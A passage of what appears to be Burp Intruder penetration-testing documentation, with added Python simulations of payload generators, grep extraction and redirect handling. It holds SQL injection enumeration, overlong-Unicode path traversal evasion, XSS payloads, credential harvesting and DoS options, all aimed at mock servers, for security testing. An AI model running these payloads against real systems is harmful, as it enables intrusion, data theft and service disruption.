The payload to use in the first request must be manually specified. The payload source can be configured to stop when duplicate successive recursive grep items are found, as this usually indicates that the enumeration is complete. Note that because each payload is derived from the response to the previous request, attacks which use this payload source cannot use multiple request threads.
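To make the loop concrete, here is an added Python simulation of the enumeration just described; it is not Burp's code. mock_server is a constructed stand-in for the vulnerable page (its object names are made up), and the extract-grep expression is the one a tester would derive from the error message quoted above.

```python
import re

# Constructed stand-in for an MS SQL backed page with the injection
# described above: the injected "union select name from sysobjects where
# name>'<previous>'" makes the server leak the next object name inside a
# type-conversion error. The object names are made up for the example.
OBJECT_NAMES = sorted(["accounts", "orders", "products", "users"])

INJECTION = "union select name from sysobjects where name>'%s'"
ERROR = "Syntax error converting the varchar value '%s' to a column of data type int."


def mock_server(payload):
    """Return the body the vulnerable page would send for this payload."""
    m = re.search(r"where name>'([^']*)'", payload)
    previous = m.group(1) if m else ""
    remaining = [n for n in OBJECT_NAMES if n > previous]
    if remaining:
        return "<html>" + ERROR % remaining[0] + "</html>"
    return "<html>No results.</html>"   # nothing left to leak: no error


# "extract grep": capture the text that follows the matched expression, up
# to the closing quote. This is the regex a tester would derive from the
# error message quoted above.
EXTRACT = re.compile(r"varchar value '([^']*)'")


def extract_grep(response):
    m = EXTRACT.search(response)
    return m.group(1) if m else None


def recursive_grep(initial="a", max_requests=1000):
    """Recursive grep loop: the capture from each response becomes the next
    payload. Stops when nothing is captured or the capture repeats (the
    stop-on-duplicate setting). Inherently single-threaded: request n+1
    depends on response n."""
    payload, found = initial, []
    for _ in range(max_requests):
        captured = extract_grep(mock_server(INJECTION % payload))
        if captured is None or captured == payload:
            break
        found.append(captured)
        payload = captured
    return found


if __name__ == "__main__":
    print(recursive_grep())
```

The max_requests cap is worth keeping in a real run as well: if the application starts returning a constant error page, the stop-on-duplicate rule ends the attack, but a page that echoes something different every time would otherwise loop indefinitely.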

Illegal Unicode
This payload source takes a preset list of payload items, and produces a number of
payloads from each item by replacing a specified character within each item with illegal
Unicode-encodings of a specified character. This payload source may be useful in
attempting to circumvent input validation based on pattern-matching, for example
defences against path traversal attacks which match on expected encodings of the ../
and ..\ sequences.

The controls at the bottom right are used to configure the list of preset items. They
function in the same way as the controls in the preset list source.

The two text boxes at the top configure the character to be substituted within each preset item (for instance *), and the character to be used as the basis for the illegal encodings (for instance /, when attacking path traversal filters). The latter can be specified using the ASCII character itself, or the two-digit hex code for the character (e.g. 00) - this is useful for specifying non-printable ASCII characters, such as null.
The controls in the middle configure the types of illegal encodings which will be generated. These are explained below:

- maximum overlong UTF-8 length - The original UTF-8 encoding scheme (RFC 2279) allows up to 6 bytes to be used to represent a single character; the current definition (RFC 3629) limits this to 4. Basic ASCII characters (0x00-0x7F) are correctly represented using a single byte. However, it is possible to represent these in the UTF-8 scheme using more than one byte (i.e. "overlong" encoding), and a lenient decoder will turn such a sequence into the same character. This drop-down menu is used to specify whether overlong encoding should be used, and if so to set the maximum size that should be used.

- illegal UTF-8 variants - This option is available if a maximum overlong UTF-8 length of 2 bytes or more is selected. When a character is encoded with more than one byte, the bytes following the first should take the binary form 10xxxxxx, to designate that they are continuation bytes. However, the most significant bits of the first byte also identify how many continuation bytes will follow, so Unicode decoding routines may safely ignore the first 2 bits of continuation bytes. This means that three illegal variants of each continuation byte are possible, with the binary forms 00xxxxxx, 01xxxxxx and 11xxxxxx. If this option is selected, then the illegal Unicode payload source will generate 3 additional encodings for each continuation byte.

- max permutations - This option is available if a maximum overlong UTF-8 length of 3 bytes or more is selected, and "illegal UTF-8 variants" is selected. If the "max permutations" option is not selected, then the illegal Unicode payload source will work through each continuation byte in turn when generating illegal variants; for each continuation byte, three illegal variants will be generated and the other continuation bytes will be unchanged. If the "max permutations" option is selected, however, then the illegal Unicode payload source will generate all permutations of illegal variants for continuation bytes - i.e. more than one continuation byte will be modified simultaneously. This feature may be useful in attempting to circumvent advanced pattern-matching controls on the target system.

- illegal hex - This option is always available. When the list of illegally-encoded items has been generated using overlong encoding and illegal variants of continuation bytes (if selected), it is possible to modify the hexadecimal encoding of the resultant byte sequences to confuse certain pattern-matching controls. Hex encoding uses the characters A - F to represent the decimal values 10 - 15. However, some hex decoders interpret G as decimal 16, H as decimal 17, etc. So 0x1G may be interpreted as decimal 32. In addition, if illegal hex characters are used in the first position of a two digit hex code, then the resultant decoding overflows the size of a single byte, and in this case some hex decoders only use the 8 least significant bits of the resulting number. So 0xG1 may be decoded as decimal 257, which is then interpreted as decimal 1. Each legal two digit hex code has between 4 and 6 corresponding illegal hex representations which are interpreted as that same hex code if decoded as described above. If the "illegal hex" option is selected, then the illegal Unicode payload source will generate all possible illegal hex encodings of each byte in the list of illegal-encoded items.

- max permutations - This option is available if a maximum overlong UTF-8 length of 2 bytes or more is selected, and "illegal hex" is selected. If the "max permutations" option is not selected, then the illegal Unicode payload source will work through each byte in turn when generating illegal hex; for each byte, between 4 and 6 illegal hex encodings will be generated and the other bytes will be unchanged. If the "max permutations" option is selected, however, then the illegal Unicode payload source will generate all permutations of illegal hex for all bytes - i.e. more than one byte will be modified simultaneously. This feature may be useful in attempting to circumvent advanced pattern-matching controls on the target system.

- add % prefix - If this option is selected, then the % character will be inserted before each two digit hex code in the payloads generated.

- lower case hex - This option determines whether lower or upper case alphabet characters will be used in hex codes.

- max encodings - This option places a ceiling on the number of illegal encodings that will be generated. This can be useful if large overlong encodings are being used and / or max permutations have been selected, as these options may generate huge numbers of illegal encodings.
When the attack is executed, this payload source iterates through the list of preset
items, and for each preset item replaces all instances of the specified character with
each item in turn in the set of illegal encodings.
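The encodings this source produces can be generated by hand for a quick sanity check of what a filter will see. Below is an added Python example, not Burp's code: overlong_utf8 and continuation_variants implement the overlong and illegal-continuation-byte rules exactly as described above; illegal_hex assumes a lenient decoder that values the digits 0-9 and A-Z as 0-35 and keeps only the low 8 bits, which is an assumption of this example, so its counts may differ from Burp's "between 4 and 6". The preset item, the marker character * and all function names are this example's own.

```python
import itertools
import string

# Added example (not Burp's code) re-creating the "illegal Unicode" source.


def overlong_utf8(codepoint, nbytes):
    """Encode `codepoint` in exactly `nbytes` bytes with the UTF-8 bit layout
    (up to 6 bytes, as in the original RFC 2279 definition). For an ASCII
    character any length above 1 is an overlong form; strict decoders
    reject it, lenient ones decode it to the same character."""
    if nbytes == 1:
        return bytes([codepoint])
    lead_prefix = (0xFF << (8 - nbytes)) & 0xFF          # 110xxxxx, 1110xxxx, ...
    lead = lead_prefix | (codepoint >> (6 * (nbytes - 1)))
    continuation = [0x80 | ((codepoint >> (6 * i)) & 0x3F)
                    for i in range(nbytes - 2, -1, -1)]
    return bytes([lead] + continuation)


def continuation_variants(encoded, max_permutations=False):
    """Replace the 10xxxxxx prefix of continuation bytes with 00, 01 or 11.
    By default one continuation byte is altered at a time (the unaltered
    sequence first); with max_permutations every combination is produced."""
    choices = [[encoded[0]]]
    for b in encoded[1:]:
        low = b & 0x3F
        choices.append([b] + [prefix | low for prefix in (0x00, 0x40, 0xC0)])
    if max_permutations:
        return [bytes(c) for c in itertools.product(*choices)]
    out = [bytes(encoded)]
    for i in range(1, len(encoded)):
        for alt in choices[i][1:]:
            out.append(encoded[:i] + bytes([alt]) + encoded[i + 1:])
    return out


# Assumption of this example: a lenient hex decoder that values 0-9 and A-Z
# as 0..35 (so G = 16, H = 17, ...) and keeps the low 8 bits of the result.
HEX_ALPHABET = string.digits + string.ascii_uppercase


def illegal_hex(byte):
    """Every two-character code other than the legal one that such a decoder
    turns into `byte`; e.g. 1G -> 32 and G1 -> 257 -> 1."""
    legal = "%02X" % byte
    codes = []
    for hi, lo in itertools.product(HEX_ALPHABET, repeat=2):
        value = (HEX_ALPHABET.index(hi) * 16 + HEX_ALPHABET.index(lo)) & 0xFF
        if value == byte and hi + lo != legal:
            codes.append(hi + lo)
    return codes


def illegal_encodings(char, max_overlong=3, variants=True,
                      max_permutations=False, percent=True, lower=True):
    """Percent-encoded illegal forms of `char`, shortest first."""
    forms = []
    for n in range(2, max_overlong + 1):
        base = overlong_utf8(ord(char), n)
        candidates = continuation_variants(base, max_permutations) if variants else [base]
        for form in candidates:
            hexed = "".join(("%%%02x" if percent else "%02x") % b for b in form)
            forms.append(hexed if lower else hexed.upper())
    return forms


def apply_to_item(item, marker, encodings):
    """Replace every `marker` in the preset item with each encoding in turn."""
    return [item.replace(marker, enc) for enc in encodings]


if __name__ == "__main__":
    encs = illegal_encodings("/", max_overlong=2)
    print(encs)
    print(apply_to_item("..*..*etc*passwd", "*", encs)[0])
    print(illegal_hex(0x2F))
```

The first printed encoding, %c0%af, is the classic two-byte overlong slash; the three that follow it carry a corrupted continuation byte (%2f, %6f, %ef) that a decoder ignoring the top two bits still reads as /. A strict decoder (Python's own str.decode("utf-8") among them) rejects every one of these forms, which is the quickest way to tell whether a target's parser is lenient.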

Character blocks
This payload source generates character blocks of specific sizes using a given input
string. It can be useful in detecting buffer overflow and other boundary condition
vulnerabilities in software running in a native (unmanaged) context:

The "string" field specifies the input string from which the character blocks will be
generated. The "min" and "max" fields specify the lengths of the smallest and largest
character blocks that may be generated. The "step" field specifies the increment in the
length of each character block.

Numbers
This payload source generates numbers, either sequentially or at random, in a specified
format:

The "from" and "to" fields specify the smallest and largest number that may be
generated. If "sequential" is selected, the numbers start at the value in the "from" field,
and are incremented by the value in the "step" field. If "random" is selected, the "how
many" field specifies the number of numbers to be generated. Numbers can be
generated in decimal or hexadecimal form. If hexadecimal is selected, then the "from",
"to" and "step" fields must contain hexadecimal integers; otherwise they may contain
decimal integers or fractions.

The controls on the right-hand side specify the number format which will be used.

Dates
This payload source generates dates between a specified range, at a specified interval,
in a specified format. This payload source may be useful during data mining (e.g.
trawling an order book for entries placed on different days) or brute forcing (e.g.
guessing the date of birth component of a user's credentials):

The dates generated start with the date specified in the "from" controls, and are incremented by the interval specified in the "step" controls, up to and including the date specified in the "to" controls. Several predefined date formats can be selected in the "format" pull-down menu, or a custom date format can be entered in the text field. The following examples illustrate the codes that can be used to specify custom date formats (they are the pattern letters of Java's SimpleDateFormat; the sample output is for Saturday 7 June 2003):

  code        output
  EEE         Sat
  EEEE        Saturday
  dd          07
  MM          06
  MMM         Jun
  MMMM        June
  yy          03
  yyyy        2003
  / . : etc   / . : (separator characters are copied through unchanged)

Brute forcer
This payload source generates a set of payloads of specified lengths which contain all
possible permutations of a specified character set.

Null payloads
This payload source generates "null" payloads - i.e. zero-length strings. It can generate
a specified number of null payloads, or continue indefinitely.

This payload source is useful when an attack requires the same request to be made
repeatedly, without any modification to the basic template. To achieve this, a single pair
of position markers should be placed together anywhere in the request template
(see Positions tab). This can be used for a variety of attacks, for example harvesting
cookies for sequencing analysis, application-layer denial-of-service attacks where
requests are repeatedly sent which initiate high-workload tasks on the server, or
keeping alive a session token which is being used in other intermittent tests.

Char frobber
This payload source operates on the existing base value of each payload position, or on
a specified string. It cycles through the base string one character at a time,
incrementing the ASCII code of that character by one.

This payload source is useful when testing which parameter values, or parts of values,
have an effect on the application's response. In particular, it can be useful when testing
which parts of a complex session token are actually being used to track session state. If
modifying the value of an individual character within the session token still causes your
request to be processed within your session, then it is likely that this character in the
token is not actually being used to track your session.

Bit flipper
This payload source operates on the existing base value of each payload position, or on
a specified string. It cycles through the base string one character at a time, flipping
each (specified) bit in turn.

You can configure the bit flipper either to operate on the literal base value, or to treat the base value as an ASCII hex string. For example, if the base value is "ab" then operating on the literal string and flipping all bits (bit 0 up to bit 7 of each character in turn) will result in the following payloads:
`b
cb
eb
ib
qb
Ab
!b
(0xE1)b
ac
a`
af
aj
ar
aB
a"
a(0xE2)
The eighth and sixteenth payloads contain the non-printable bytes 0xE1 and 0xE2 ("a" and "b" with bit 7 flipped); they are shown here as hex values because they cannot be printed.
Whereas treating "ab" as an ASCII hex string (the single byte 0xAB) and flipping all bits will result in the following payloads:
aa
a9
af
a3
bb
8b
eb
2b
This payload source can be useful in similar situations to the char frobber but where
you need finer-grained control. For example, if session tokens or other parameter
values contain meaningful data encrypted with a block cipher in CBC mode, it may be
possible to change parts of the decrypted data systematically by modifying bits within
the preceding cipher block. In this situation, you can use the bit flipper payload source
to determine the effects of modifying individual bits within the encrypted value, and
understand whether the application may be vulnerable.
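An added Python example, not Burp's code, of the three generators used here (char frobber, literal bit flipper, hex-string bit flipper) and of the analysis they support. The session token "a1b2c3d4" and the oracle that only checks its first four characters are constructed for the example.

```python
# Added example (not Burp's code): char frobber and bit flipper payload
# sources, plus the "which characters does the application actually check"
# analysis the text describes.


def char_frobber(base):
    """One payload per character: that character's code incremented by one."""
    return [base[:i] + chr((ord(ch) + 1) & 0xFF) + base[i + 1:]
            for i, ch in enumerate(base)]


def bit_flipper_literal(base, bits=range(8)):
    """Operate on the literal value: flip each selected bit of each byte in
    turn. Results are bytes because flipping bit 7 yields non-ASCII values
    (0xE1 and 0xE2 for the text's "ab" example)."""
    raw = base.encode("latin-1")
    out = []
    for i in range(len(raw)):
        for bit in bits:
            flipped = bytearray(raw)
            flipped[i] ^= 1 << bit
            out.append(bytes(flipped))
    return out


def bit_flipper_hex(base, bits=range(8)):
    """Treat the value as ASCII hex: decode, flip one bit, re-encode."""
    raw = bytes.fromhex(base)
    out = []
    for i in range(len(raw)):
        for bit in bits:
            flipped = bytearray(raw)
            flipped[i] ^= 1 << bit
            out.append(flipped.hex())
    return out


# Constructed oracle standing in for the application: it accepts the token
# when the first four characters match and ignores the rest.
VALID_TOKEN = "a1b2c3d4"


def session_still_valid(token):
    return token[:4] == VALID_TOKEN[:4]


def unused_positions(token, oracle):
    """Positions whose frobbed value still leaves the session valid, i.e. the
    characters the application is apparently not using."""
    return [i for i, payload in enumerate(char_frobber(token)) if oracle(payload)]


if __name__ == "__main__":
    print(bit_flipper_literal("ab"))
    print(bit_flipper_hex("ab"))
    print(unused_positions(VALID_TOKEN, session_still_valid))
```

In a real attack the oracle is a match-grep column (for example the absence of "please log in") rather than a function, but the reading is the same: positions that can be frobbed without losing the session carry no state, so the effective token is shorter than it looks.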

Username generator
This payload source takes human names as input, and generates usernames using
various common schemes.

For example, supplying the name "peter weiner" results in up to 115 possible
usernames, as follows:
peterweiner
peter.weiner
weinerpeter
weiner.peter
peter
weiner
peterw
peter.w
wpeter
w.peter
pweiner
p.weiner
weinerp
weiner.p
etc...
This payload source can be useful if you are targeting a particular human user, and you
do not know the username or email address scheme in use within an application.

Payload processing
For each payload set, in addition to the "source" of payloads to use, it is possible to
define various additional processing to be performed on each payload. This processing
is carried out after all manipulation performed by the selected payload source:

The defined rules are executed in sequence, and can be toggled on and off to help
debug any problems with the configuration. The following types of rule are available:

- add prefix
- add suffix
- match/replace
- substring (from a specified offset up to a specified length)
- reverse substring (as substring, but indexed from the end of the payload)
- modify case (same options as for the case substitution payload source)
- encode (as URL, HTML, Base64, ASCII hex and constructed strings for various platforms)
- decode (as URL, HTML, Base64 and ASCII hex)
- hash
- addition of raw payload (this can be useful if you need to include the same payload in both raw and hashed form)
Finally, you can configure which characters within the resulting payload should be URL-encoded for safe transmission within HTTP requests:

It is recommended to use this setting for final URL-encoding, rather than a payload
processing rule, because the payload grep option can be used to check responses for
echoed payloads before the final URL-encoding is applied.
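The processing chain and the separate final URL-encoding step can be modelled in a few lines. The following Python is an added example, not Burp's code: process applies a rule list in sequence and final_url_encode performs the transmission-time encoding; the rule lists and payloads in __main__ are constructed, and the "constructed strings for various platforms" encoders are omitted.

```python
import base64
import hashlib
import html
import re
import urllib.parse

# Added example (not Burp's code): Intruder-style payload processing rules
# followed by the separate, final URL-encoding step.

CASE = {
    "no change": lambda s: s,
    "to lower case": str.lower,
    "to upper case": str.upper,
    "to Propername": lambda s: s[:1].upper() + s[1:].lower(),
    "to ProperName": lambda s: s[:1].upper() + s[1:],
}

ENCODE = {
    "URL": lambda s: urllib.parse.quote(s, safe=""),
    "HTML": lambda s: html.escape(s, quote=True),
    "Base64": lambda s: base64.b64encode(s.encode()).decode(),
    "ASCII hex": lambda s: s.encode().hex(),
}

DECODE = {
    "URL": urllib.parse.unquote,
    "HTML": html.unescape,
    "Base64": lambda s: base64.b64decode(s).decode(),
    "ASCII hex": lambda s: bytes.fromhex(s).decode(),
}


def process(payload, rules):
    """Apply (rule name, argument) pairs in order. Returns a list because
    "add raw payload" emits the unprocessed payload as an extra item."""
    current, extra = payload, []
    for name, arg in rules:
        if name == "add prefix":
            current = arg + current
        elif name == "add suffix":
            current = current + arg
        elif name == "match/replace":                   # (regex, replacement)
            current = re.sub(arg[0], arg[1], current)
        elif name == "substring":                       # (offset, length)
            current = current[arg[0]:arg[0] + arg[1]]
        elif name == "reverse substring":               # same, indexed from the end
            current = current[::-1][arg[0]:arg[0] + arg[1]][::-1]
        elif name == "modify case":
            current = CASE[arg](current)
        elif name == "encode":
            current = ENCODE[arg](current)
        elif name == "decode":
            current = DECODE[arg](current)
        elif name == "hash":                            # md5, sha1, sha256, ...
            current = hashlib.new(arg, current.encode()).hexdigest()
        elif name == "add raw payload":
            extra.append(payload)
        else:
            raise ValueError("unknown rule %r" % name)
    return [current] + extra


def final_url_encode(payload, characters):
    """Transmission-time encoding of only the listed characters, applied
    after processing so grep checks can still use the raw payload."""
    return "".join("%%%02X" % ord(c) if c in characters else c for c in payload)


if __name__ == "__main__":
    # constructed: try "password" both hashed and raw against a login form
    print(process("password", [("hash", "md5"), ("add raw payload", None)]))
    # constructed: wrap a dictionary word in the site's quoting, then encode it safely
    for p in process("admin", [("add suffix", "' OR 1=1--"), ("modify case", "to ProperName")]):
        print(final_url_encode(p, " '&="))
```

Keeping final_url_encode outside process is the point the text makes: the attack sends Admin%27%20OR%201%3D1-- but remembers Admin' OR 1=1--, so a response that echoes the decoded value still matches the payload grep.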

Options tab
This tab contains various configuration options which control the behaviour of individual
attacks.

These options are used to configure the manipulation of HTTP headers in generated
requests.
If the "update Content-Length header" box is checked, then Burp Intruder will add or
update the Content-Length HTTP header in each request, with the correct value for the
length of the HTTP body of that particular request. This feature is usually essential for
attacks which insert variable-length payloads into the body of the template HTTP
request. The HTTP specification, and most web servers, require the correct value for the
length of the HTTP body to be specified using the Content-Length header. If the correct
value is not specified, then the target server may return an error, may respond to an
incomplete request, or may wait indefinitely for further data to be received in the
request.
If "set Connection: close" is checked, then Burp Intruder will add or update the Connection HTTP header to request that the connection is closed following each individual request. In some cases (when the server does not itself return a valid Content-Length or Transfer-Encoding header, so that the end of a response can only be detected when the connection closes), this option may allow attacks to be performed more quickly.
Note: Earlier versions of Burp Intruder contained options here to add a cookie header to
the request, based on the response to a different request. These configurations have
now been removed, and you should use the suite-wide session handling
support instead.
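What the "update Content-Length header" and "set Connection: close" options do to each generated request is shown by the following added Python example (not Burp's code). The template, which uses Burp's § position markers around base values, and the host example.test are constructed; sniper_requests reproduces the sniper attack type described under the Positions tab, one payload per position with the other positions left at their base values.

```python
# Added example (not Burp's code): build Intruder-style attack requests from
# a template with § payload position markers, fixing up Content-Length and
# Connection as the Options tab settings describe.

MARKER = "\u00a7"   # the § character Burp uses to delimit payload positions

# Constructed template: the text between each marker pair is the base value.
TEMPLATE = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "username=" + MARKER + "admin" + MARKER + "&password=" + MARKER + "letmein" + MARKER
)


def base_values(template):
    return template.split(MARKER)[1::2]


def set_header(headers, name, value):
    """Update an existing header (case-insensitively) or append it."""
    out, done = [], False
    for h in headers:
        if h.lower().startswith(name.lower() + ":"):
            out.append("%s: %s" % (name, value))
            done = True
        else:
            out.append(h)
    if not done:
        out.append("%s: %s" % (name, value))
    return out


def build_request(template, values, update_content_length=True, connection_close=True):
    """Substitute one value per payload position, then fix the headers."""
    parts = template.split(MARKER)
    if len(parts) % 2 == 0 or len(values) != len(parts) // 2:
        raise ValueError("marker/value count mismatch")
    request = "".join(text + value for text, value in zip(parts[0::2], list(values) + [""]))
    head, sep, body = request.partition("\r\n\r\n")
    headers = head.split("\r\n")
    if update_content_length:
        headers = set_header(headers, "Content-Length", str(len(body.encode("utf-8"))))
    if connection_close:
        headers = set_header(headers, "Connection", "close")
    return "\r\n".join(headers) + sep + body


def sniper_requests(template, payload_set):
    """Sniper attack type: each payload in each position in turn, with the
    remaining positions left at their base values."""
    bases = base_values(template)
    requests = []
    for i in range(len(bases)):
        for payload in payload_set:
            values = list(bases)
            values[i] = payload
            requests.append(build_request(template, values))
    return requests


def content_length(request):
    """Read back the Content-Length header of a built request (None if absent)."""
    for line in request.split("\r\n\r\n", 1)[0].split("\r\n"):
        if line.lower().startswith("content-length:"):
            return int(line.split(":", 1)[1])
    return None


if __name__ == "__main__":
    print(build_request(TEMPLATE, ["admin", "letmein' OR '1'='1"]))
    print(len(sniper_requests(TEMPLATE, ["a", "b", "c"])), "requests")
```

The body length is measured after UTF-8 encoding, which matters as soon as a payload set contains non-ASCII characters: a Content-Length computed on the character count would be short, and the server would either wait for the missing bytes or process a truncated request, the two failure modes the text describes.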

The concurrent threads setting determines whether the attack will launch requests
synchronously in a single thread, or concurrently using multiple threads. Using multiple
threads can rapidly accelerate a large attack, where the main time factor is the latency
between issuing each request and receiving a response. It can be used to test for
concurrent processing vulnerabilities in applications. And it can be used to increase the
effectiveness of application-layer denial-of-service attacks.
The retry settings determine how many times Burp will repeat a request if a network
failure occurs (e.g. the connection is refused or times out), and how long it will wait
between retries.
The throttle settings are used to configure any time delay required between requests. A
fixed delay may be desirable as a stealth precaution, to avoid a performance impact, to
preserve bandwidth or processing power for other activities, or to perform a required
action periodically, such as keeping alive a session token which is being used in other
intermittent tests. A variable delay can be useful to automate the detection of session
timeout values.
The start settings determine whether the attack will begin immediately when launched,
or will begin after a specified delay, or will wait until the "resume" command is selected
(see Results view). This function can be useful if an attack is being configured which will
be executed at some future point, or saved for future use.

The storage settings determine whether the attack will save the contents of individual
requests and responses. Saving requests and responses consumes disk space in your
temporary directory, but enables you to view these in full during an attack, repeat
individual requests if necessary, and send items to other Burp tools.
If the "make unmodified baseline request" option is selected, then in addition to the
configured attack requests, Burp will issue the template request with all payload
positions set to their base values. This request will show as item #0 in the results table.
If the "DoS mode" option is selected, then the attack will issue requests as normal but
will not wait to process any responses received from the server. As soon as each
request is issued, the TCP connection is closed. This function can be used to perform
application-layer denial-of-service attacks against vulnerable applications, by repeatedly
sending requests which initiate high-workload tasks on the server.
If the "store full payloads" option is selected, Burp will store the full payload values for
each result. This option consumes additional memory but may be required if you want
to perform certain actions at runtime, such as modifying payload grep settings, or
reissuing requests with a modified request template.

The "grep" settings are used to configure various pattern-matching based tests to be
performed at runtime on server responses. There are three types of tests:
match grep - This is used to check each server response for specified expressions,
either simple pattern matches or Perl-like regular expressions. For each specified
expression, the attack will include a column in the results table indicating whether a
match was found. This basic feature has a wide variety of uses, for example: in
password guessing attacks, scanning for phrases such as "password incorrect" or "login
successful"; in testing for SQL injection vulnerabilities, scanning for messages
containing "ODBC", "error", etc.
If regular expressions are used as matching expressions, then these may contain
newline characters.
extract grep - This is used to check each server response for specified expressions,
and if present to extract the text immediately following the matched expression (up to
a specified delimiter or maximum length). For each specified expression, the attack will
include a column in the results table containing the text extracted from each server
response. This feature can be used for data mining, where access has been gained to a
web page containing useful information, and an automated means of extracting this
information is required. For example, if you have gained access to a user administration
page, which is used to access or update the account information of the user whose ID is

specified in the URL query string, then you can execute an attack which iterates
through user IDs and extracts the username and password of each user.
If the same matching expression is added multiple times in succession, then each
server response will be searched for multiple occurrences of that expression, and the
text immediately following each occurrence will be captured. This can be useful, e.g.
when an HTML table contains useful information but there are no unique prefixes with
which to automatically pick out each item.
payload grep - This is used to check each server response for the payload string(s) which were used in the corresponding request. This feature is useful in detecting cross-site scripting and other response injection vulnerabilities, which can arise when user input is dynamically inserted into the application's response.
If the "match against pre-encoded payloads" option is selected, then responses are
searched for the raw form of each payload string before any encoding was applied
(see Payload processing). Setting this option is normally desirable - for example, if you
use XSS test payloads containing typographical characters, these will typically need to
be URL-encoded in the payload processing options, but will appear in responses in their
pre-encoded form if the application is vulnerable.
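The three grep tests, run over constructed responses, as an added Python example that is not Burp's code. The login page, admin page, table row and reflected search page are made up; the expressions are what a tester would type into the grep settings for them.

```python
import re
import urllib.parse

# Added example (not Burp's code): match grep, extract grep and payload grep
# applied to constructed server responses.

# Constructed responses.
LOGIN_FAILED = "<html><body><p>Login failed: password incorrect</p></body></html>"
ADMIN_PAGE = ("<html><body>Username: <b>alice</b><br>"
              "Password: <b>Welcome1</b></body></html>")
TABLE_ROW = "<tr><td>alice</td><td>alice@example.test</td><td>Welcome1</td></tr>"
ECHOED = "<html><body>Search results for <svg onload=alert(1)></body></html>"


def match_grep(response, expressions, regex=False):
    """One flag per expression: simple substring or (multi-line) regex match."""
    if regex:
        return [re.search(e, response, re.DOTALL) is not None for e in expressions]
    return [e in response for e in expressions]


def extract_grep(response, expression, delimiter=None, max_length=100, all_occurrences=False):
    """Text following each literal match, up to the delimiter or max_length.
    Adding the same expression repeatedly in Intruder captures successive
    occurrences; all_occurrences=True does the same here."""
    captured = []
    for m in re.finditer(re.escape(expression), response):
        tail = response[m.end():m.end() + max_length]
        if delimiter and delimiter in tail:
            tail = tail[:tail.index(delimiter)]
        captured.append(tail)
        if not all_occurrences:
            break
    return captured


def payload_grep(response, payload, match_pre_encoded=True):
    """Is the payload reflected? With match_pre_encoded the raw payload is
    searched for, even though it was URL-encoded on the wire."""
    needle = payload if match_pre_encoded else urllib.parse.quote(payload, safe="")
    return needle in response


if __name__ == "__main__":
    print(match_grep(LOGIN_FAILED, ["password incorrect", "welcome"]))
    print(extract_grep(ADMIN_PAGE, "Username: <b>", "</b>"),
          extract_grep(ADMIN_PAGE, "Password: <b>", "</b>"))
    print(extract_grep(TABLE_ROW, "<td>", "</td>", all_occurrences=True))
    print(payload_grep(ECHOED, "<svg onload=alert(1)>"),
          payload_grep(ECHOED, "<svg onload=alert(1)>", match_pre_encoded=False))
```

The last line prints True then False: the page reflects the decoded payload, so only the pre-encoded comparison flags it, which is why the option is normally left on.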

The redirect settings control whether Burp Intruder will follow HTTP redirects (i.e. those
with a 3xx status code and a Location header containing a new URL) when performing
an attack. If configured to follow redirects, then when a redirect is received Intruder will
request the redirection URL (following up to 10 redirections if necessary), and record
the details of the subsequent response within the results. A column in the results table
will indicate whether a redirect was followed for each individual result. You can
configure whether to follow only on-site (i.e. same protocol, host and port) redirects,
only in-scope (defined in Target tab) redirects, or to follow all redirects.

The option to follow redirects is often useful when an application returns a 3xx response
to various kinds of input, with the more interesting features of the application's
processing of your request being returned when the redirection target is requested. For
example, when fuzzing for common vulnerabilities, the application may frequently
return a redirect to an error page - this page may contain useful information about the
nature of the error which can be used to diagnose bugs like SQL injection.
Note that in some situations it may be necessary to use only a single-threaded attack
when redirects are being followed, for example if the application stores within the
session the information which is returned by the next request to the redirection target.
Note also that automatically following redirects may sometimes cause problems for your
attack - for example, if the application responds to some malicious requests with a
redirection to the logout page, then following redirects may result in your session being
terminated when it would not otherwise do so.
If the "process cookies in redirects" option is selected, then any cookies set in the 3xx
response will be resubmitted when the redirection target is followed. For example, this
option may be necessary if you are attempting to brute force a login challenge which
always returns a redirection to a page indicating the login result, and a new session is
created in response to each login attempt.
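An added Python example, not Burp's code, of the redirect rules just described: the on-site test compares protocol, host and port (with default ports filled in, so app.test and app.test:80 are the same site), the in-scope test checks a prefix list, and process_cookies carries Set-Cookie values from the 3xx response into the follow-up request. mock_send is a constructed transport for a login that always redirects to a result page and issues a fresh session on every attempt; the hostnames are made up.

```python
from urllib.parse import urljoin, urlparse

# Added example (not Burp's code): Intruder-style redirect following.

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    u = urlparse(url)
    scheme = u.scheme.lower()
    return (scheme, u.hostname, u.port or DEFAULT_PORTS.get(scheme))


def should_follow(request_url, location, mode, scope=()):
    """mode: 'never', 'on-site' (same protocol, host and port), 'in-scope'
    (URL starts with one of the scope prefixes) or 'always'."""
    target = urljoin(request_url, location)      # Location may be relative
    if mode == "never":
        return False
    if mode == "always":
        return True
    if mode == "on-site":
        return origin(target) == origin(request_url)
    if mode == "in-scope":
        return any(target.startswith(prefix) for prefix in scope)
    raise ValueError("unknown mode %r" % mode)


def cookies_from(headers):
    """Name/value pairs from every Set-Cookie header (attributes dropped)."""
    jar = {}
    for name, value in headers:
        if name.lower() == "set-cookie":
            k, _, v = value.split(";", 1)[0].partition("=")
            jar[k.strip()] = v.strip()
    return jar


def follow(send, url, cookies, mode, scope=(), process_cookies=True, max_hops=10):
    """Issue the request and follow up to max_hops redirects per the mode.
    send(url, cookies) -> (status, headers, body). Returns the final
    status and body, the hops taken, and the cookie jar in effect."""
    status, headers, body = send(url, cookies)
    hops = []
    while 300 <= status < 400 and len(hops) < max_hops:
        location = next((v for k, v in headers if k.lower() == "location"), None)
        if location is None or not should_follow(url, location, mode, scope):
            break
        if process_cookies:
            cookies = {**cookies, **cookies_from(headers)}
        url = urljoin(url, location)
        hops.append(url)
        status, headers, body = send(url, cookies)
    return status, body, hops, cookies


# Constructed transport: every login attempt creates a new session and
# redirects to /result, which is only meaningful with that new session.
def mock_send(url, cookies):
    path = urlparse(url).path
    if path == "/login":
        return 302, [("Location", "/result"), ("Set-Cookie", "session=fresh42; Path=/")], ""
    if path == "/result":
        if cookies.get("session") == "fresh42":
            return 200, [], "<p>Login failed</p>"
        return 200, [], "<p>Session expired, please log in</p>"
    return 404, [], ""


if __name__ == "__main__":
    print(follow(mock_send, "http://app.test/login", {}, "on-site"))
    print(follow(mock_send, "http://app.test/login", {}, "on-site", process_cookies=False))
```

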